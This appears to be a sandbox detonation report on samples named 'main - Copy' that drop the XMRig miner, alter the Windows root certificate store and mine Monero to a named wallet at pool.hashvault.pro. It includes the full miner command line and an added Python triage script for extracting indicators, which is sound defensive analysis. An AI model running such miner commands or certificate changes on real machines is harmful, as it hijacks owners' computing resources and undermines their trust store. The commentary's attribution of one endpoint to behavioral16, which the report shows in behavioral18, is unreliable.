memory/4776-15-0x000001FEEE6E0000-0x000001FEEE700000-memory.dmp

memory/4776-16-0x00007FF6EF0E0000-0x00007FF6EFBE3000-memory.dmp

memory/4776-18-0x000001FF82960000-0x000001FF82980000-memory.dmp

memory/4776-17-0x000001FF82730000-0x000001FF82750000-memory.dmp

memory/4776-19-0x00007FF6EF0E0000-0x00007FF6EFBE3000-memory.dmp


Analysis: behavioral8

Detonation Overview

Submitted

2024-06-14 12:47

Reported

2024-06-14 13:30

Platform

win10v2004-20240508-en

Max time kernel

1569s

Max time network

1581s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp

Files

N/A

Analysis: behavioral9

Detonation Overview

Submitted

2024-06-14 12:47

Reported

2024-06-14 13:30

Platform

win10v2004-20240508-en

Max time kernel

1766s

Max time network

1781s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp

Files

N/A

Analysis: behavioral13

Detonation Overview

Submitted

2024-06-14 12:47

Reported

2024-06-14 13:49

Platform

win10v2004-20240611-en

Max time kernel

1793s

Max time network

1794s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = [certificate blob, hex omitted] C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = [certificate blob, hex omitted] C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network

Country Destination Domain Proto
US 8.8.8.8:53 69.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 57.169.31.20.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 95.179.241.203:80 pool.hashvault.pro tcp
US 8.8.8.8:53 203.241.179.95.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 203.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 50.192.11.51.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6


Analysis: behavioral14

Detonation Overview

Submitted

2024-06-14 12:47

Reported

2024-06-14 13:49

Platform

win10v2004-20240508-en

Max time kernel

1667s

Max time network

1686s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp

Files

N/A

Analysis: behavioral15

Detonation Overview

Submitted

2024-06-14 12:47

Reported

2024-06-14 13:49

Platform

win10v2004-20240508-en

Max time kernel

1791s

Max time network

1801s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3728,i,14221647728265121051,6840906015709541562,262144 --variations-seed-version --mojo-platform-channel-handle=4100 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4988,i,14221647728265121051,6840906015709541562,262144 --variations-seed-version --mojo-platform-channel-handle=4924 /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp

Files

N/A

Analysis: behavioral18

Detonation Overview

Submitted

2024-06-14 12:47

Reported

2024-06-14 13:49

Platform

win10v2004-20240611-en

Max time kernel

1793s

Max time network

1787s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = [certificate blob, hex omitted] C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = [certificate blob, hex omitted] C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network

Country Destination Domain Proto
US 8.8.8.8:53 68.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 203.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 45.76.89.70:80 pool.hashvault.pro tcp
US 8.8.8.8:53 70.89.76.45.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 138.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6


Analysis: behavioral19

Detonation Overview

Submitted

2024-06-14 12:47

Reported

2024-06-14 13:49

Platform

win10v2004-20240611-en

Max time kernel

1793s

Max time network

1784s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy.exe"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = [certificate blob, hex omitted] C:\Users\Admin\AppData\Local\Temp\main - Copy.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = [certificate blob, hex omitted] C:\Users\Admin\AppData\Local\Temp\main - Copy.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\main - Copy.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy.exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy.exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 13.107.21.237:443 g.bing.com tcp
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 67.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 237.21.107.13.in-addr.arpa udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.109.133:443 objects.githubusercontent.com tcp
NL 23.62.61.171:443 www.bing.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 171.61.62.23.in-addr.arpa udp
DE 95.179.241.203:80 pool.hashvault.pro tcp
US 8.8.8.8:53 203.241.179.95.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 177.23.48.23.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
IE 52.111.236.22:443 tcp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 0.204.248.87.in-addr.arpa udp
US 8.8.8.8:53 131.72.42.20.in-addr.arpa udp
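The xmrig command line and the Network table above are the two places an analyst pivots from, and a few details in them deserve a second look. --url names pool.hashvault.pro on port 80 but --tls is also set, so the stratum session is TLS on a port most egress filters treat as plain HTTP (the table confirms the TCP session to 95.179.241.203:80). --tls-fingerprint pins the pool's certificate, so a TLS-inspecting proxy makes the miner refuse the connection rather than expose its JSON-RPC traffic. --user carries a 95-character Monero address; that wallet is the longest-lived indicator on this page, since the pool resolved to a different host in behavioral16 (45.76.89.70:80) than here, which is a reason to block on the hostname rather than the IP. The SeLockMemoryPrivilege rows under Suspicious use of AdjustPrivilegeToken are xmrig enabling large pages, which on Windows require that privilege; an unsigned binary in %TEMP% holding it is a useful detection on its own. The in-addr.arpa queries and the bing.com sessions are resolution and OS background noise. The Python below is an added example, not part of the sandbox report, that parses such a command line into those indicators, validates the wallet format, and finds the corroborating TCP session in the Network rows. The option table it understands is the subset of XMRig's real CLI options that matter here, and the rows embedded as sample input are copied from the table above.

```python
import re
import shlex
from typing import Optional

# Command line exactly as recorded in the process tree above.
XMRIG_CMDLINE = (
    "xmrig-6.21.0\\xmrig.exe --url pool.hashvault.pro:80 "
    "--user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR "
    "--pass T --donate-level 1 --tls "
    "--tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14"
)

# Rows copied from the Network table above as sample input for the corroboration
# step: country, destination, optional resolved domain, protocol.
NETWORK_ROWS = """\
US 8.8.8.8:53 pool.hashvault.pro udp
US 8.8.8.8:53 203.241.179.95.in-addr.arpa udp
GB 20.26.156.215:443 github.com tcp
US 185.199.109.133:443 objects.githubusercontent.com tcp
DE 95.179.241.203:80 pool.hashvault.pro tcp
IE 52.111.236.22:443 tcp
"""

# XMRig options that carry indicators (with short aliases) and the flags that take no value.
SHORT_OPTS = {"-o": "--url", "-u": "--user", "-p": "--pass", "-a": "--algo", "-t": "--threads"}
VALUELESS = {"--tls", "--nicehash", "--keepalive", "-k", "--background", "-B", "--no-color"}
# Standard (4...) or sub- (8...) Monero address: 95 base58 characters, no 0/O/I/l.
MONERO_ADDR = re.compile(r"^[48][1-9A-HJ-NP-Za-km-z]{94}$")


def parse_xmrig_cmdline(cmdline: str) -> dict:
    """Extract pool, wallet and TLS settings from an xmrig-style command line."""
    tokens = shlex.split(cmdline, posix=False)      # non-POSIX mode keeps Windows backslashes
    args, opts, flags, i = tokens[1:], {}, set(), 0
    while i < len(args):
        tok = args[i]
        if tok.startswith("--") and "=" in tok:     # --url=host:port form
            key, val = tok.split("=", 1)
            opts[key] = val
        elif tok in VALUELESS:
            flags.add(tok)
        elif tok.startswith("-"):
            key = SHORT_OPTS.get(tok, tok)
            if i + 1 < len(args) and not args[i + 1].startswith("-"):
                opts[key] = args[i + 1]
                i += 1
            else:
                flags.add(key)
        i += 1
    m = re.match(r"^(stratum\+(?:tcp|ssl))://(.*)$", opts.get("--url", ""))
    scheme, url = m.groups() if m else ("", opts.get("--url", ""))
    host, _, port = url.partition(":")
    wallet, donate = opts.get("--user", ""), opts.get("--donate-level", "")
    return {
        "image": tokens[0].strip('"'),
        "pool_host": host,
        "pool_port": int(port) if port.isdigit() else None,
        "wallet": wallet,
        "wallet_is_monero": bool(MONERO_ADDR.match(wallet)),
        "tls": "--tls" in flags or scheme == "stratum+ssl",
        "tls_fingerprint": opts.get("--tls-fingerprint"),
        "donate_level": int(donate) if donate.isdigit() else None,
    }


def corroborating_connection(rows: str, host: str) -> Optional[str]:
    """Return the ip:port of the TCP session to `host`, ignoring DNS and PTR noise."""
    for line in rows.splitlines():
        parts = line.split()
        if len(parts) == 4:
            _, dest, domain, proto = parts
        elif len(parts) == 3:                       # rows without a resolved name
            (_, dest, proto), domain = parts, ""
        else:
            continue
        if proto == "tcp" and domain == host:
            return dest
    return None


def triage(cmdline: str = XMRIG_CMDLINE, rows: str = NETWORK_ROWS) -> dict:
    """Combine both views into the findings an analyst would write up."""
    iocs = parse_xmrig_cmdline(cmdline)
    endpoint = corroborating_connection(rows, iocs["pool_host"])
    findings = []
    if iocs["wallet_is_monero"]:
        findings.append("Monero wallet passed as --user: " + iocs["wallet"])
    if iocs["tls"] and iocs["pool_port"] not in (None, 443):
        findings.append(f"TLS stratum on non-standard port {iocs['pool_port']}")
    if iocs["tls_fingerprint"]:
        findings.append("pool certificate pinned; TLS interception will break the session")
    if endpoint:
        findings.append(f"pool {iocs['pool_host']} contacted at {endpoint}")
    return {"iocs": iocs, "pool_endpoint": endpoint, "findings": findings}


if __name__ == "__main__":
    for finding in triage()["findings"]:
        print("-", finding)
```

Run as-is it reports the wallet, the TLS-on-80 pool session, the certificate pin and the 95.179.241.203:80 endpoint; feeding it the behavioral16 rows instead gives the same wallet with the 45.76.89.70:80 endpoint, which is the point of keying detections on the wallet and hostname.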

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

memory/3968-14-0x0000024594110000-0x0000024594130000-memory.dmp

memory/3968-15-0x0000024594160000-0x0000024594180000-memory.dmp

memory/3968-16-0x00007FF601D40000-0x00007FF602843000-memory.dmp

memory/3968-18-0x00000245941A0000-0x00000245941C0000-memory.dmp

memory/3968-17-0x0000024594180000-0x00000245941A0000-memory.dmp

memory/3968-19-0x00007FF601D40000-0x00007FF602843000-memory.dmp

memory/3968-20-0x00007FF601D40000-0x00007FF602843000-memory.dmp

memory/3968-21-0x00007FF601D40000-0x00007FF602843000-memory.dmp

memory/3968-22-0x0000024594180000-0x00000245941A0000-memory.dmp

memory/3968-23-0x00000245941A0000-0x00000245941C0000-memory.dmp

memory/3968-24-0x00007FF601D40000-0x00007FF602843000-memory.dmp

memory/3968-25-0x00007FF601D40000-0x00007FF602843000-memory.dmp

memory/3968-26-0x00007FF601D40000-0x00007FF602843000-memory.dmp

memory/3968-27-0x00007FF601D40000-0x00007FF602843000-memory.dmp

memory/3968-28-0x00007FF601D40000-0x00007FF602843000-memory.dmp

memory/3968-29-0x00007FF601D40000-0x00007FF602843000-memory.dmp

memory/3968-30-0x00007FF601D40000-0x00007FF602843000-memory.dmp

memory/3968-31-0x00007FF601D40000-0x00007FF602843000-memory.dmp

memory/3968-32-0x00007FF601D40000-0x00007FF602843000-memory.dmp

memory/3968-33-0x00007FF601D40000-0x00007FF602843000-memory.dmp

memory/3968-34-0x00007FF601D40000-0x00007FF602843000-memory.dmp

memory/3968-35-0x00007FF601D40000-0x00007FF602843000-memory.dmp

memory/3968-36-0x00007FF601D40000-0x00007FF602843000-memory.dmp

memory/3968-37-0x00007FF601D40000-0x00007FF602843000-memory.dmp

memory/3968-38-0x00007FF601D40000-0x00007FF602843000-memory.dmp

memory/3968-39-0x00007FF601D40000-0x00007FF602843000-memory.dmp

memory/3968-40-0x00007FF601D40000-0x00007FF602843000-memory.dmp

memory/3968-41-0x00007FF601D40000-0x00007FF602843000-memory.dmp

memory/3968-42-0x00007FF601D40000-0x00007FF602843000-memory.dmp

memory/3968-43-0x00007FF601D40000-0x00007FF602843000-memory.dmp

memory/3968-44-0x00007FF601D40000-0x00007FF602843000-memory.dmp

memory/3968-45-0x00007FF601D40000-0x00007FF602843000-memory.dmp

memory/3968-46-0x00007FF601D40000-0x00007FF602843000-memory.dmp

memory/3968-47-0x00007FF601D40000-0x00007FF602843000-memory.dmp

memory/3968-48-0x00007FF601D40000-0x00007FF602843000-memory.dmp

memory/3968-49-0x00007FF601D40000-0x00007FF602843000-memory.dmp

memory/3968-50-0x00007FF601D40000-0x00007FF602843000-memory.dmp

memory/3968-51-0x00007FF601D40000-0x00007FF602843000-memory.dmp

memory/3968-52-0x00007FF601D40000-0x00007FF602843000-memory.dmp

memory/3968-53-0x00007FF601D40000-0x00007FF602843000-memory.dmp

memory/3968-54-0x00007FF601D40000-0x00007FF602843000-memory.dmp

memory/3968-55-0x00007FF601D40000-0x00007FF602843000-memory.dmp

memory/3968-56-0x00007FF601D40000-0x00007FF602843000-memory.dmp

memory/3968-57-0x00007FF601D40000-0x00007FF602843000-memory.dmp

memory/3968-58-0x00007FF601D40000-0x00007FF602843000-memory.dmp

memory/3968-59-0x00007FF601D40000-0x00007FF602843000-memory.dmp

memory/3968-60-0x00007FF601D40000-0x00007FF602843000-memory.dmp

memory/3968-61-0x00007FF601D40000-0x00007FF602843000-memory.dmp

memory/3968-62-0x00007FF601D40000-0x00007FF602843000-memory.dmp

memory/3968-63-0x00007FF601D40000-0x00007FF602843000-memory.dmp

memory/3968-64-0x00007FF601D40000-0x00007FF602843000-memory.dmp

memory/3968-65-0x00007FF601D40000-0x00007FF602843000-memory.dmp

memory/3968-66-0x00007FF601D40000-0x00007FF602843000-memory.dmp

memory/3968-67-0x00007FF601D40000-0x00007FF602843000-memory.dmp

memory/3968-68-0x00007FF601D40000-0x00007FF602843000-memory.dmp

memory/3968-69-0x00007FF601D40000-0x00007FF602843000-memory.dmp

memory/3968-70-0x00007FF601D40000-0x00007FF602843000-memory.dmp

memory/3968-71-0x00007FF601D40000-0x00007FF602843000-memory.dmp

memory/3968-72-0x00007FF601D40000-0x00007FF602843000-memory.dmp

memory/3968-73-0x00007FF601D40000-0x00007FF602843000-memory.dmp

memory/3968-74-0x00007FF601D40000-0x00007FF602843000-memory.dmp

memory/3968-75-0x00007FF601D40000-0x00007FF602843000-memory.dmp

memory/3968-76-0x00007FF601D40000-0x00007FF602843000-memory.dmp

memory/3968-77-0x00007FF601D40000-0x00007FF602843000-memory.dmp

memory/3968-78-0x00007FF601D40000-0x00007FF602843000-memory.dmp

memory/3968-79-0x00007FF601D40000-0x00007FF602843000-memory.dmp

memory/3968-80-0x00007FF601D40000-0x00007FF602843000-memory.dmp

memory/3968-81-0x00007FF601D40000-0x00007FF602843000-memory.dmp

memory/3968-82-0x00007FF601D40000-0x00007FF602843000-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-06-14 12:47

Reported

2024-06-14 13:30

Platform

win10v2004-20240508-en

Max time kernel

1702s

Max time network

1715s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp

Files

N/A

Analysis: behavioral5

Detonation Overview

Submitted

2024-06-14 12:47

Reported

2024-06-14 13:30

Platform

win10v2004-20240508-en

Max time kernel

1605s

Max time network

1617s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp

Files

N/A

Analysis: behavioral10

Detonation Overview

Submitted

2024-06-14 12:47

Reported

2024-06-14 13:30

Platform

win10v2004-20240611-en

Max time kernel

1792s

Max time network

1788s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
64 matches recorded, all fields N/A

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = (value elided) C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = (value elided) C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network

Country Destination Domain Proto
US 204.79.197.237:443 g.bing.com tcp
NL 23.62.61.115:443 www.bing.com tcp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.109.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 17.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 249.197.17.2.in-addr.arpa udp
US 8.8.8.8:53 115.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 95.179.241.203:80 pool.hashvault.pro tcp
US 8.8.8.8:53 203.241.179.95.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 240.197.17.2.in-addr.arpa udp
US 8.8.8.8:53 29.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 88.16.208.104.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

